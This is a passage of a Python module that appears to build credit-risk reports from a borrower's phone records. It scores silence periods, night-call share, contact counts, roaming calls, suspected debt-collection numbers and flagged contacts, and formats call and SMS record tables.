\"手机长时间静默情况\",\n \"result\": assess,\n \"accord\": name,\n \"assess\": d[result],\n 'max_result': max_result,\n }\n except:\n import traceback\n traceback.print_exc()\n return {\n \"name\": \"手机长时间静默情况\",\n \"result\": '0',\n \"accord\": '近6个月出现0次手机长时间静默情况,失联风险低',\n \"assess\": 1,\n 'max_result': 0,\n }\n\n def night_phone(self, data_r, flag):\n \"\"\" 夜间通话占比 \"\"\"\n if data_r is None:\n data_r = {}\n\n def judge_night(d):\n def calcu(t):\n try:\n if 0 <= int(t[0:2]) <= 4:\n return True\n return False\n except:\n return False\n\n if d['connTime'] == '2330' or d['connTime'] == '0500' or calcu(d['connTime']):\n return True\n return False\n\n # data = self.data.get('deceitRisk', {}).get('callDuration', []).copy()\n data = data_r.copy()\n if not data and flag is False:\n\n return {\n \"name\": \"夜间通话占比\",\n \"result\": '',\n \"accord\": '',\n \"assess\": 6,\n }\n try:\n night_count, sum_ = 0, 0\n for ele in data:\n sum_ += int(ele.get('connTimes', 0))\n if judge_night(ele) is True:\n night_count += int(ele.get('connTimes', 0))\n\n def out_put(night, sum_):\n template1 = '近6个月夜间通话占比≦10%,违约风险低'\n template2 = '近6个月夜间通话占比10%~30%,有违约风险'\n template3 = '近6个月夜间通话占比>30%,违约风险较高'\n\n r = two_num(night_count * 100 / sum_ if sum_ else 0)\n level = None\n if r <= 10:\n ret_ = template1\n level = 1\n elif r < 30:\n ret_ = template2\n level = 2\n else:\n ret_ = template3\n level = 4\n\n return {\n \"name\": \"夜间通话占比\",\n \"result\": ('%.2f' % r if r else '0.0') + '%',\n \"accord\": ret_,\n \"assess\":level\n }\n\n return out_put(night_count, sum_)\n except:\n return {\n \"name\": \"夜间通话占比\",\n \"result\": 0,\n \"accord\": '近6个月夜间通话占比≦10%,违约风险低',\n \"assess\": 1,\n }\n\n def contract_num(self, data_r, flag):\n \"\"\" 联系人数量 (6个月)\"\"\"\n # data = self.data.get(\"monthCallInfo\").copy()\n if data_r is None:\n data_r = {}\n\n data = data_r.copy()\n data = data.get('sixMonth', {})\n if not data and flag is False:\n\n return {\n \"name\": \"联系人数量\",\n \"result\": '',\n \"accord\": '',\n \"assess\": 6,\n }\n try:\n template = {\n 0: '近6个月联系人数量大于10人时,失联风险低',\n 1: '近6个月联系人数量低于10人时,有失联风险' }\n\n num = int(data.get(\"contactsNum\", 0))\n level = 0\n if num < 10:\n level = 1\n return {\n 'name': '联系人数量',\n 'result': num,\n \"accord\": template[level],\n 'assess': level + 1}\n except:\n return {\n 'name': '联系人数量',\n 'result': 0,\n \"accord\": \"近6个月联系人数量低于10人时,有失联风险\",\n 'assess': 1}\n\n def contact_phone_num(self, data_r, flag):\n \"\"\" 互通电话数量 \"\"\"\n # data = self.data.get(\"monthCallInfo\").copy()\n if data_r is None:\n data_r = {}\n data = data_r.copy()\n data = data.get('sixMonth', {})\n if not data and flag is False:\n\n return {\n \"name\": \"互通电话数量\",\n \"result\": '',\n \"accord\": '',\n \"assess\": 6,\n }\n try:\n template = {\n 1: '近6个月互通电话数小于5人时,有失联风险',\n 0: '近6个月互通电话数大于5人时,失联风险低'}\n\n num = int(data.get(\"mutualNum\", 0))\n level = 0\n if num < 5:\n level = 1\n return {\n 'name': '互通电话数量',\n 'result': num,\n \"accord\": template[level],\n 'assess': level + 1}\n except:\n return {\n \"name\": \"互通电话数量\",\n \"result\": 0,\n \"accord\": '近6个月互通电话数小于5人时,有失联风险',\n \"assess\": 1,\n }\n\n def remote_phone_rate(self, data_r, flag):\n \"\"\" 异地通话占比 \"\"\"\n if data_r is None:\n data_r = {}\n data = data_r.copy()\n data = data.get('deceitRisk', {}).get(\"monthCallInfo\", {}).get(\"oneMonth\", {})\n # 进入到这个函数说明已经查询良,但是没有查询到数据而已\n if not data:\n return {\n \"name\": \"异地通话记录\",\n \"result\": 0,\n \"accord\": '近1个月异地通话时间占比小于30%时,违约风险低',\n \"assess\": 1,\n }\n all_num = data.get('allNum', 1)\n template = {\n 0: '近1个月异地通话时间占比小于30%时,违约风险低',\n 1: '近1个月异地通话时间占比小于50%时,有违约风险',\n 2: '近1个月异地通话时间占比大于50%时,违约风险高'\n }\n template_li = '{0}通话{1}次,通话时间{2}分钟,主叫{3}次、被叫{4}次,最近通话时间{5} '\n self_phone_area = data_r.get(\"baseInfo\", {}).get(\"phoneBelongArea\", \"\")\n city = data_r.get(\"baseInfo\", {}).get(\"city\", \"\")\n province = data_r.get(\"baseInfo\", {}).get(\"province\", \"\")\n self_phone_type = data_r.get(\"phoneInfo\", {}).get(\"operator\", \"\")\n\n def num_(d):\n try:\n return int(d)\n except:\n return 0\n\n def init_dict(d, key):\n if key in d:\n return\n d[key] = {\n 'times': 0,\n \"duration\": 0, # 通话时间\n \"callTimes\": 0,\n \"calledTimes\": 0,\n \"lastTime\": datetime.datetime.strptime(\"1970-01-01\", \"%Y-%m-%d\")\n }\n\n def cus_time_handle(d):\n try:\n return datetime.datetime.strptime(d, \"%Y-%m-%d %H:%M:%S\")\n except:\n return datetime.datetime.strptime(\"1970-01-01\", \"%Y-%m-%d\")\n\n def cus_time_str(d):\n try:\n if d == datetime.datetime.strptime(\"1970-01-01\", \"%Y-%m-%d\"):\n return '--'\n return d.strftime(\"%Y-%m-%d %H:%M:%S\")\n except:\n return '--'\n\n def ratio_han(a, b):\n try:\n return float('%.2f' % (a*100/b))\n except:\n return 0\n\n def dict_num_handle(src, dest):\n area = src.get(\"location\", \"\") or \"\"\n init_dict(dest, area)\n dest[area]['duration'] = num_(dest[area].get(\"duration\", \"\")) + num_(src.get(\"duration\", 0))\n dest[area]['callTimes'] = num_(dest[area].get(\"callTimes\", \"\")) + (1 if src.get(\"dial_type\", '') == 'DIAL' else 0)\n dest[area]['calledTimes'] = num_(dest[area].get(\"calledTimes\", \"\")) + (0 if src.get(\"dial_type\", '') == 'DIAL' else 1)\n dest[area]['lastTime'] = dest[area]['lastTime'] if dest[area]['lastTime'] < cus_time_handle(src.get(\"time\")) else cus_time_handle(src.get(\"time\"))\n dest[area]['times'] += 1\n\n remote_result = {}\n remote_count = 0\n\n def remote(city, province, location, location_type):\n mobileCity = city # 帐号归属城市\n mobileProvince = province # 帐号归属省份\n ROAM_1 = u\"漫游\"\n ROAM_2 = u\"非\"\n ROAM_3 = u\"异地\"\n ROAM_4 = u\"边漫\"\n # 判定为非异地通话\n if mobileCity and mobileProvince and location:\n if mobileProvince == location or mobileProvince + u\"省\" == location:\n return False\n # 判定为异地通话\n if location not in mobileCity and mobileCity not in location:\n return True\n else:\n\n # 通话地类型是漫游的判定为漫游\n if not location_type:\n return False\n # 通话地类型是漫游的判定为漫游\n if (ROAM_1 in location_type and ROAM_2 in location_type) or ROAM_3 in location_type or ROAM_4 in location_type:\n # 判定为异地通话\n return True\n # 判定为非异地通话\n return False\n\n def map_f(ele, sum_d):\n nonlocal city, province, self_phone_area, remote_count\n\n # if self_phone_type is True and (ele.get(\"location\", \"\") != self_phone_area): # 联通\n # return\n # if self_phone_type is False and ('本地' not in ele.get(\"location_type\", '')):\n # return\n# location = ele.get(\"location\", \"\")\n# if not location:\n# location = \"\"\n# if not isinstance(self_phone_area, str) and len(self_phone_area) <= 2:\n# return\n# if self_phone_area[2:] in location:\n# return\n if not remote(city, province, ele.get(\"location\", \"\"), ele.get(\"location_type\", \"\")):\n return\n remote_count += 1\n # 数据计算\n dict_num_handle(ele, sum_d)\n\n def result_handle(key, value):\n \"\"\" \"\"\"\n return template_li.format(key, value['times'], '%.2f' % float(two_num(value['duration'] / 60)), value['callTimes'],\n value['calledTimes'], cus_time_str(value.get('lastTime', '')))\n\n map_f_par = partial(map_f, sum_d=remote_result)\n import json\n list(map(map_f_par, data.get(\"callList\", [])))\n\n # d = list(map(result_handle, remote_result))\n html_lis = ''.join([result_handle(key, value) for key, value in remote_result.items()])\n ratio = ratio_han(remote_count, all_num)\n\n url = \"\"\n result = 0\n if ratio < 30:\n url += template[0]\n result = 1\n elif ratio <= 50:\n url += template[1]\n result = 2\n else:\n url += template[2]\n result = 4\n\n url += ' '\n url += html_lis\n return {\n \"name\": \"异地通话记录\",\n \"result\": (('%.2f' % ratio) if ratio else ('%.1f' % ratio)) + \"%\",\n \"accord\": url,\n \"assess\": result\n }\n\n def collection_list(self, data_r, flag):\n \"\"\" 疑似催收 \"\"\"\n data = data_r.copy()\n if not data and flag is False:\n\n return {\n \"name\": \"疑似催收号码\",\n \"result\": '',\n \"accord\": '',\n \"assess\": 6,\n }\n try:\n cuishou_list = data\n sum_ = len(cuishou_list)\n if sum_:\n ll = \"\" + \" \".join(cuishou_list) + \" \"\n else:\n ll = \"\"\n level = 1\n if 3 <= sum_ <= 5:\n level = 2\n elif sum_ > 5:\n level = 4\n temp = {\n 1: \"近3个月未发现连续号段疑似催收号码{0}\",\n 2: \"近3个月与3~5个连续号段号码有联系,风险等级关注{0}\",\n 4: \"近3个月与5个以上连续号段号码有联系,风险等级高{0}\"\n }\n return {\n \"name\": \"疑似催收号码\",\n \"accord\": temp[level].format(ll),\n \"assess\": level,\n \"result\": 0 if sum_ < 3 else sum_\n }\n except:\n return {\n \"name\": \"疑似催收号码\",\n \"accord\": \"近3个月未发现连续号段疑似催收号码\",\n \"assess\": 1,\n \"result\": 0\n }\n\n def contact_tel_risk(self, data_r, flag):\n \"\"\" 联系人电商平台高危客户 \"\"\"\n template0 = '检测到电商平台高危客户:'\n template1 = '{0}主动呼叫次数{1}次,最近通话时间{2}; '\n template = '未检测到电商平台高危客户'\n deceit_risk = data_r.get('deceitRisk', {}) or {}\n tel_risk_list = deceit_risk.get('telRiskList', []) or []\n tel_risk = len(tel_risk_list)\n call_records_info = data_r.get('callRecordsInfo', []) or []\n if not tel_risk_list and flag is False:\n return {\n \"name\": \"联系人电商平台高危客户\",\n \"result\": '',\n \"accord\": '',\n \"assess\": 6,\n }\n elif not tel_risk_list:\n return {\n \"name\": \"联系人电商平台高危客户\",\n \"result\": 0,\n \"accord\": template,\n \"assess\": 1,\n }\n\n def level_handle(le):\n if le == 0:\n return 1\n elif le < 3:\n return le + 1\n else:\n return 4\n\n call_records_info_dict = {}\n [call_records_info_dict.update({i['phoneNo']: i}) for i in call_records_info]\n\n def _time(t):\n try:\n return datetime.datetime.fromtimestamp(t).strftime('%Y-%m-%d %H:%M:%S')\n except:\n return '2016-01-01 00:00:00'\n accord = [template1.format(i, call_records_info_dict[i]['callTimes'], _time(call_records_info_dict[i]['lastCallTime'])) for i in tel_risk_list if i in call_records_info_dict]\n accord = template0 + \"\" + ''.join(accord) + \" \"\n return {\n 'name': \"联系人电商平台高危客户\",\n 'result': tel_risk,\n 'accord': accord,\n 'assess': level_handle(tel_risk)\n }\n\n def contact_xinfo_risk(self, data_r, flag):\n \"\"\" 联系人信息台高危客户 \"\"\"\n template0 = '检测到信息平台高危客户:'\n template1 = '{0}主动呼叫次数{1}次,最近通话时间{2}; '\n template = '未检测到信息平台高危客户'\n deceit_risk = data_r.get('deceitRisk', {}) or {}\n info_risk_list = deceit_risk.get('infoRiskList', []) or []\n info_risk = len(info_risk_list)\n call_records_info = data_r.get('callRecordsInfo', []) or []\n if not info_risk_list and flag is False:\n\n return {\n \"name\": \"联系人信息平台高危客户\",\n \"result\": '',\n \"accord\": '',\n \"assess\": 6,\n }\n\n elif not info_risk_list:\n return {\n \"name\": \"联系人信息平台高危客户\",\n \"result\": 0,\n \"accord\": template,\n \"assess\": 1,\n }\n\n def level_handle(le):\n if le == 0:\n return 1\n elif le < 3:\n return le + 1\n else:\n return 4\n\n call_records_info_dict = {}\n [call_records_info_dict.update({i['phoneNo']: i}) for i in call_records_info]\n\n def _time(t):\n try:\n return datetime.datetime.fromtimestamp(t).strftime('%Y-%m-%d %H:%M:%S')\n except:\n return '2016-01-01 00:00:00'\n accord = [template1.format(i, call_records_info_dict[i]['callTimes'], _time(call_records_info_dict[i]['lastCallTime'])) for i in info_risk_list if i in call_records_info_dict]\n accord = template0 + \"\" + ''.join(accord) + \" \"\n return {\n 'name': \"联系人信息平台高危客户\",\n 'result': info_risk,\n 'accord': accord,\n 'assess': level_handle(info_risk)\n }\n\n def contact_social_risk(self, data_r, flag):\n \"\"\" 联系人社交平台高危客户 \"\"\"\n template0 = '检测到社交平台高危客户'\n template1 = '{0}主动呼叫次数{1}次,最近通话时间{2}; '\n template = '未检测到社交平台高危客户'\n deceit_risk = data_r.get('deceitRisk', {}) or {}\n social_risk_list = deceit_risk.get('socialRiskList', []) or []\n social_risk = len(social_risk_list)\n call_records_info = data_r.get('callRecordsInfo', []) or []\n\n if not social_risk_list and flag is False:\n\n return {\n \"name\": \"联系人社交平台高危客户\",\n \"result\": '',\n \"accord\": '',\n \"assess\": 6,\n }\n\n elif not social_risk_list:\n return {\n \"name\": \"联系人社交平台高危客户\",\n \"result\": 0,\n \"accord\": template,\n \"assess\": 1,\n }\n\n def level_handle(le):\n if le == 0:\n return 1\n elif le < 3:\n return le + 1\n else:\n return 4\n\n call_records_info_dict = {}\n [call_records_info_dict.update({i['phoneNo']: i}) for i in call_records_info]\n\n def _time(t):\n try:\n return datetime.datetime.fromtimestamp(t).strftime('%Y-%m-%d %H:%M:%S')\n except:\n return '2016-01-01 00:00:00'\n accord = [template1.format(i, call_records_info_dict[i]['callTimes'], _time(call_records_info_dict[i]['lastCallTime'])) for i in social_risk_list if i in call_records_info_dict]\n accord = template0 + \"\" + ''.join(accord) + \" \"\n return {\n 'name': \"联系人社交平台高危客户\",\n 'result': social_risk,\n 'accord': accord,\n 'assess': level_handle(social_risk)\n }\n\n def risk_phone_analyze(self, data_r, flag):\n \"\"\" 风险号码标识记录分析 \"\"\"\n risk_nums = ('贷款中介', '信用卡', '律师电话', '法院电话', '110电话', '澳门电话')\n data = self.data.get(\"callRecordsInfo\", []).copy()\n # flag = True\n # if not data:\n # flag = False\n\n ret = [0] * len(risk_nums)\n for i in range(len(ret)):\n ret[i] = {\n 'callTimes': 0 if flag is True else '',\n 'calledTimes': 0 if flag is True else '',\n \"connCallTime\": 0 if flag is True else '',\n \"connCalledTimes\": 0 if flag is True else '',\n \"connTimes\": 0 if flag is True else '',\n 'lastCallTime': 0 if flag is True else '',\n \"phoneSum\": 0 if flag is True else '',\n 'tag': risk_nums[i] if i != 1 else \"信用卡中心\",\n }\n if flag is False:\n for i in range(len(ret)):\n ret[i]['lastCallTime'] = ''\n return ret\n\n for ele in data:\n remark = ele.get('remark', '')\n # 没有标记的直接跳过\n if (not remark) or (remark not in risk_nums):\n continue\n\n sb_index = risk_nums.index(remark)\n\n # ret[sb_index] = {\n # 'callTimes': ret[remark].get('callTimes', 0),\n # 'calledTimes': 0,\n # \"connCallTime\": 0,\n # \"connCalledTimes\": 0,\n # \"connTimes\": 0,\n # 'lastCallTime': 0,\n # \"phoneSum\": 0\n # }\n\n ret[sb_index]['callTimes'] += int(ele.get('callTimes', 0))\n ret[sb_index]['calledTimes'] += int(ele.get('calledTimes', 0))\n ret[sb_index]['connCallTime'] += int(ele.get('connCallTime', 0))\n ret[sb_index]['connCalledTimes'] += int(ele.get('connCalledTimes', 0))\n ret[sb_index]['connTimes'] += int(ele.get('connTimes', 0))\n if ele.get('lastCallTime') > int(ret[sb_index]['lastCallTime']):\n ret[sb_index]['lastCallTime'] = int(ele.get('lastCallTime'))\n ret[sb_index]['phoneSum'] += 1\n\n result = []\n\n for ele in ret:\n result.append({\n \"callTimes\": ele.get(\"connTimes\", 0), # 通话次数\n \"calledMinute\": second_to_minute(int(ele.get(\"connCalledTime\", 0))), # 被叫时间\n \"calledTimes\": ele.get(\"calledTimes\", 0), # 被叫次数\n \"callingMinute\": second_to_minute(int(ele.get(\"connCallTime\", 0))), # 主叫���间\n \"callingTimes\": ele.get(\"callTimes\"), # 主叫次数\n \"lastConnTime\": cao_time_time_to_str(int(ele.get(\"lastCallTime\", 0))),\n \"tag\": ele.get(\"tag\", ''),\n \"telNum\": ele.get(\"phoneSum\", 0), # 号码数量\n })\n\n return result\n\n def important_conn_analysis(self, data_r, relation=None, work=None, school=None, flag=True):\n \"\"\" 重要联系人分析 \"\"\"\n if data_r is None:\n data_r = {}\n data = data_r.copy()\n data = data.get(\"callRecordsInfo\", []).copy()\n\n def get_relation_phone(ph, d):\n if d is None:\n return False\n if ph == d['phone']:\n return True\n return False\n\n def num_handle(d):\n try:\n return int(d)\n except:\n return 0\n\n def add_ele(list_, v2):\n phone_n = v2.get(\"phoneNo\", '')\n flag = False\n indexs = []\n # 如果几个联系人号码一样, 那么后面那个起作用\n if get_relation_phone(phone_n, relation):\n indexs.append(0)\n flag = True\n if get_relation_phone(phone_n, work):\n indexs.append(1)\n flag = True\n if get_relation_phone(phone_n, school):\n indexs.append(2)\n flag = True\n\n if flag is True:\n for index in indexs:\n v1 = list_[index]\n count = num_handle(v2.get('callTimes')) + num_handle(v2.get(\"calledTimes\"))\n v1[\"callTimes\"] = count\n v1[\"ratio\"] = \"\"\n v1[\"address\"] = v2.get(\"belongArea\", \"\")\n v1[\"callingTimes\"] = v2.get(\"callTimes\", 0)\n v1[\"calledTimes\"] = v2.get(\"calledTimes\", 0)\n v1[\"coverageCallMinute\"] = '%.2f' % float(two_num(second_to_minute(num_handle(v2.get(\"connCallTime\", 0)) + num_handle(v2.get(\"connCalledTime\", 0))) / count))\n\n def my_list(iter_l):\n l = []\n tmp_d = {\n \"type\": \"\",\n \"relation\": '',\n \"name\": '',\n \"telphone\": '',\n \"callTimes\": 0,\n # \"ratio\": \"\",\n \"address\": '',\n \"callingTimes\": 0,\n \"calledTimes\": 0,\n \"coverageCallMinute\": '0.00'\n }\n\n def map_f(key):\n nonlocal tmp_d\n d = tmp_d.copy()\n if key is None:\n return d\n d.update({\n \"type\": key['type'],\n 'relation': key['relation'],\n 'name': key['name'],\n 'telphone': key['phone']\n })\n return d\n l = list(map(map_f, iter_l))\n return l\n\n sum_ = 0\n\n def map_func(old, ele):\n # nonlocal sum_, r, w, s\n\n sum_, tuple_import = old[0], old[1]\n\n sum_ += num_handle(ele.get(\"connTimes\"))\n # if relation.get(\"\")\n # if get_relation_phone(phone_n, relation) or get_relation_phone(phone_n, work) or \\\n # get_relation_phone(phone_n, school):\n # for index, _ in enumerate(tuple_import):\n add_ele(tuple_import, ele)\n return sum_, tuple_import\n\n init_param = my_list([relation, work, school])\n from functools import reduce\n sum_, ret = list(reduce(map_func, data, (0, init_param)))\n\n for i in range(len(ret)):\n x = ret[i]\n ret[i]['ratio'] = '%.2f' % two_num(num_handle(x.get('callTimes', 0))*100 / sum_) if sum_ != 0 else 0\n ret = list(filter(lambda x: x['telphone'], ret))\n return ret\n\n def important_conn_chart(self, data, rel, work, school):\n \"\"\" 中套联系人趋势分析 \"\"\"\n d = (rel, work, school)\n today_ = data.get(\"baseInfo\", {}).get(\"reportTime\", \"\")\n try:\n today_ = datetime.datetime.strptime(today_, '%Y-%m-%d %H:%M:%S')\n except:\n today_ = datetime.datetime.now()\n\n ret, today =[], today_\n six_month = {}\n data = data.get(\"deceitRisk\", {}).get(\"monthCallInfo\", {}).get(\"sixMonth\", {}).get(\"callList\", [])\n\n def time_handle(current_day, index):\n nonlocal six_month\n\n six_month[current_day.strftime('%Y%m')] = 0\n if index >= 6:\n return\n last_month = datetime.timedelta(days=current_day.day)\n a = current_day - last_month\n time_handle(a, index + 1)\n\n time_handle(today, 1)\n # time_keys = .keys()\n relation = (six_month.copy(), six_month.copy(), six_month.copy())\n\n def map_f(ele):\n nonlocal ret, six_month, d, data\n if ele is None:\n return\n index = d.index(ele)\n for record in data:\n # print(\"\\mbudeg : \", record.get(\"peer_number\"), ele.get(\"phone\"))\n if record.get(\"peer_number\", '') == ele.get(\"phone\"):\n month = record.get('month', '')\n if month in relation[index]:\n relation[index][month] += 1\n\n list(map(map_f, d))\n\n def map_ret(ele):\n nonlocal d, relation, ret\n index = d.index(ele)\n if ele is None:\n return\n d2 = [{\"callTimes\": value, 'time': datetime.datetime.strptime(key, '%Y%m')\n } for key, value in relation[index].items()]\n d2 = sorted(d2, key=lambda x: x['time'])\n ret.append({\n \"name\": ele.get(\"type\", ''),\n \"value\": d2\n })\n list(map(map_ret, d))\n return ret\n\n def connection_top_analyze(self, data_r, top_n=5):\n \"\"\" 联系人top分析 \"\"\"\n data = data_r.copy()\n data = data.get(\"callRecordsInfo\", {}).copy()\n # 倒序\n data = sorted(data, key=lambda x: int(x.get('connTimes', 0)), reverse=True)\n ret, sum_ = [], 0\n\n for i in range(len(data)):\n sum_ += int(data[i].get(\"connTimes\"))\n if i >= top_n:\n continue\n\n ret.append({\n \"address\": data[i].get(\"belongArea\", ''),\n \"callTimes\": int(data[i].get(\"connTimes\", 0)),\n \"calledTimes\": data[i].get(\"calledTimes\", 0),\n \"callingTimes\": data[i].get(\"callTimes\", 0),\n 'tag': data[i]['remark'],\n \"coverageCallTime\": two_num((second_to_minute(int(data[i].get(\"connCallTime\", 0)) + int(data[i].get(\"connCalledTime\", 0)))) / int(data[i].get(\"connTimes\", 0))),\n \"ratio\": \"\",\n \"label\": data[i].get(\"label\", \"--\"),\n \"telphone\": data[i].get(\"phoneNo\", '')\n })\n for i in range(top_n):\n if i >= len(data):\n break\n if sum_ != 0:\n ret[i]['ratio'] ='%.2f' % two_num(int(ret[i]['callTimes'])*100 / sum_)\n else:\n ret[i]['ratio'] = 0\n\n return ret\n\n def phone_region_top5(self, data_r, top_n=5):\n \"\"\" 本人通话区域top5分析 \"\"\"\n data = data_r.get('callPlaceInfo', {}).copy()\n data = sorted(data, key=lambda x: int(x['dayStop']), reverse=True)\n ret, sum_ = [], 0\n\n def time_str_handler(d):\n if isinstance(d, str) and d[0:4] == '1970':\n return ''\n\n # if isinstance(d, str) and len(d) == 8:\n # return d[0:4] + '-' +d[4:6] + '-' + d[6:]\n return cao_time_time_to_str(d)\n # return d\n\n for index in range(top_n):\n if index >= len(data):\n break\n ele = data[index]\n sum_ += ele.get('connTimes', 0)\n if index > top_n:\n continue\n\n ret.append({\n \"address\": ele.get(\"commType\", ''),\n \"callTimes\": ele.get(\"connTimes\", ''),\n 'days': ele.get(\"dayStop\", ''),\n \"firstTime\": time_str_handler( int(ele.get(\"firstCallTime\", 0)) ) or '',\n \"lastTime\": time_str_handler( int(ele.get(\"lastCallTime\", 0)) ) or '',\n \"ratio\": ''\n })\n for i in range(top_n):\n if i >= len(data):\n break\n if sum_ != 0:\n ret[i]['ratio'] = '%.2f' % two_num(int(ret[i]['callTimes'])*100 / sum_)\n else:\n ret[i]['ratio'] = 0\n\n return ret\n\n def contract_area(self, data_r, top_n=5):\n \"\"\" 联系人区域top5分析 \"\"\"\n if data_r is None:\n data_r = {}\n data = data_r.get('contactsPlaceInfo', {}).copy()\n data = sorted(data, key=lambda x: int(x.get(\"phoneNum\", 0)), reverse=True)\n ret, sum = [], 0\n\n for index in range(top_n):\n if index >= len(data):\n break\n ele = data[index]\n sum += int(ele.get('phoneNum', 0))\n if index > top_n:\n continue\n\n ret.append({\n \"address\": ele.get(\"commPlac\", ''),\n \"calledSecond\": '%.2f' % second_to_minute(int(ele.get(\"calledTime\", 0))),\n \"calledTimes\": ele.get(\"calledTimes\", 0),\n \"callingSecond\": '%.2f' % second_to_minute(int(ele.get(\"callTime\", 0))),\n \"callingTimes\": ele.get(\"callTimes\", 0),\n \"ratio\": '',\n \"telNum\": ele.get(\"phoneNum\")\n })\n for i in range(top_n):\n if i >= len(data):\n break\n ret[i]['ratio'] = '%.2f' % two_num(int(ret[i]['telNum'])*100 / sum if sum != 0 else 0)\n return ret\n\n def conversation_slot(self, data_r):\n \"\"\" 通话时段 \"\"\"\n data = data_r.get(\"callDuration\", {}).copy()\n data = sorted(data, key=lambda x: int(x.get(\"startTime\", 0)))\n\n def encode_(d):\n d = int(d)\n if 530 <= d <900:\n return 0\n elif 900 <= d < 1130:\n return 1\n elif 1130 <= d < 1330:\n return 2\n elif 1330 <= d < 1730:\n return 3\n elif 1730 <= d < 2330:\n return 4\n elif 130 <= d < 530:\n return 6\n else:\n return 5\n d = {\n 0: 0,\n 1: 0,\n 2: 0,\n 3: 0,\n 4: 0,\n 5: 0,\n 6: 0}\n duation = ['05:30-09:00', '09:00-11:30', '11:30-13:30', '13:30-17:30', '17:30-23:30', '23:30-01:30', '01:30-05:30']\n ret, sum_ = [], 0\n\n def map_f(x):\n nonlocal sum_\n n = encode_(x['connTime'])\n d[n] += int(x['connTimes'])\n sum_ += int(x['connTimes'])\n\n list(map(map_f, data))\n\n for i in range(7):\n ele = {\n 'ratio': '%.2f' % two_num(d[i] * 100 / sum_ if sum_ != 0 else 0),\n 'contactTimes': d[i],\n 'time': duation[i]\n }\n ret.append(ele)\n return ret\n\n def average_consume(self, data):\n \"\"\" 计算每个月平均消费 \"\"\"\n if not isinstance(data, list):\n return ''\n sum_, count = 0, 0\n\n def money_unit_trans(d, rate=1, type_=0):\n try:\n ret = float(d) / rate\n if type_ != 0:\n ret = float('%.2f' % ret)\n return ret\n except:\n return 0\n\n for i in data:\n count += 1\n sum_ += money_unit_trans(i.get(\"billFee\", 0))\n\n if count == 0:\n return ''\n\n sum_ = sum_ / count\n sum_ = money_unit_trans(sum_, type_=1)\n sum_ = two_num(sum_/100)\n return sum_\n\n # 用户异常行为分析\n def user_exception_handler(self, data_r, flag, token=None, now=None):\n data = data_r.copy()\n if not data:\n if token:\n word = '查询中'\n else:\n word = '未查询'\n ret = [\n {\n \"name\": \"手机长时间静默情况\",\n \"result\": '',\n \"accord\": word,\n \"assess\": 6,\n },\n {\n \"name\": \"夜间通话占比\",\n \"result\": '',\n \"accord\": word,\n \"assess\": 6,\n },\n {\n \"name\": \"联系人数量\",\n \"result\": '',\n \"accord\": word,\n \"assess\": 6,\n },\n {\n \"name\": \"互通电话数量\",\n \"result\": '',\n \"accord\": word,\n \"assess\": 6,\n },\n {\n \"name\": \"异地通话记录\",\n \"result\": '',\n \"accord\": word,\n \"assess\": 6,\n },\n {\n \"name\": \"疑似催收号码\",\n \"result\": '',\n \"accord\": word,\n \"assess\": 6,\n },\n {\n \"name\": \"联系人电商平台高危客户\",\n \"result\": '',\n \"accord\": word,\n \"assess\": 6,\n },\n {\n \"name\": \"联系人信息平台高危客户\",\n \"result\": '',\n \"accord\": word,\n \"assess\": 6,\n },\n {\n \"name\": \"联系人社交平台高危客户\",\n \"result\": '',\n \"accord\": word,\n \"assess\": 6,\n }\n\n ]\n return ret\n\n ret = []\n ret.append(self.long_time_slicense(data.get('deceitRisk', {}).get(\"silenceInfo\", []), flag, now))\n ret.append(self.contract_num(data.get('deceitRisk', {}).get(\"monthCallInfo\", {}), flag))\n ret.append(self.contact_phone_num(data.get('deceitRisk', {}).get(\"monthCallInfo\", {}), flag))\n ret.append(self.night_phone(data.get('deceitRisk', {}).get('callDuration', []), flag))\n # ret.append(self.remote_phone_rate(data.get('deceitRisk', {}).get(\"monthCallInfo\", {}), flag))\n ret.append(self.remote_phone_rate(data, flag))\n ret.append(\n self.collection_list(data.get(\"deceitRisk\", {}).get(\"monthCallInfo\", {}\n ).get(\"threeMonth\", {}).get(\"collectionList\", []), flag))\n # ret.append(self.contact_tel_risk( data, flag))\n # ret.append(self.contact_xinfo_risk(data, flag))\n # ret.append(self.contact_social_risk(data, flag))\n return ret\n\n @classmethod\n def contract_record(cls, data_r, s_type, page, count, apply_number=None):\n \"\"\" 通话记录分析 \"\"\"\n if data_r is None:\n data_r = []\n data = data_r.copy()\n def key_f(d):\n nonlocal s_type\n if s_type == 1 and (not (d['remark'] or d.get('label'))):\n return False\n return True\n total_remark = None\n if s_type == 0:\n total_remark = 0\n for i in data:\n if i['remark'] or i.get('label'):\n total_remark += 1\n\n data = sorted(filter(key_f, data), key=lambda x: int(x.get(\"connTimes\", 0)), reverse=True)\n\n total, ret = len(data), []\n if total_remark is None:\n total_remark = total\n\n if count == -1:\n start, end = 0, total\n else:\n start, end = (page - 1) * count, page * count\n\n def _ret(i):\n\n return {\n \"belongArea\": i.get('belongArea', ''),\n \"callTimes\": i.get('callTimes', ''),\n \"calledTimes\": i.get(\"calledTimes\", ''),\n \"connTime\": two_num(second_to_minute(int(i.get('connCallTime', 0))) + second_to_minute(int(i.get('connCalledTime', 0)))),\n \"connTimes\": i.get(\"connTimes\", ''),\n \"identifyInfo\": i.get(\"remark\", ''),\n \"label\": i.get(\"label\", \"--\"),\n \"phoneNo\": i.get(\"phoneNo\")\n }\n\n ret = [_ret(i) for i in data]\n res = {\n 'total': total,\n 'callDetail': ret,\n 'totalRemark': total_remark\n }\n if apply_number:\n save_to_cache(apply_number, res, 'call_record_view')\n\n res['callDetail'] = res['callDetail'][start: end]\n\n return res\n\n @classmethod\n def sms_record_analyze(self, data_r, s_type, page, count, apply_number=None):\n \"\"\" 短信记录分析 \"\"\"\n data = data_r.copy()\n\n def key_f(d):\n nonlocal s_type\n # if s_type == 1 and not d['remark']:\n if s_type == 1 and (not (d['remark'] or d.get('label'))):\n return False\n return True\n\n total_remark = None\n if s_type == 0:\n total_remark = 0\n for i in data:\n if i['remark'] or i.get('label'):\n total_remark += 1\n\n data = sorted(filter(key_f, data), key=lambda x: int(x.get(\"totalSmsNumber\", 0)), reverse=True)\n total, ret = len(data), []\n\n if total_remark is None:\n total_remark = total\n if count == -1:\n start, end = 0, total\n else:\n start, end = (page - 1) * count, page * count\n\n def _detail(i):\n\n return {\n \"belongArea\": i.get('belongArea', ''),\n \"identifyInfo\": i.get(\"remark\", ''),\n \"phoneNo\": i.get(\"phoneNo\"),\n \"label\": i.get(\"label\", '--'),\n \"totalSmsNumber\": i.get(\"totalSmsNumber\", '')\n }\n\n ret = [_detail(i) for i in data]\n\n res = {\n 'total': total,\n 'msgDetail': ret,\n \"totalRemark\": 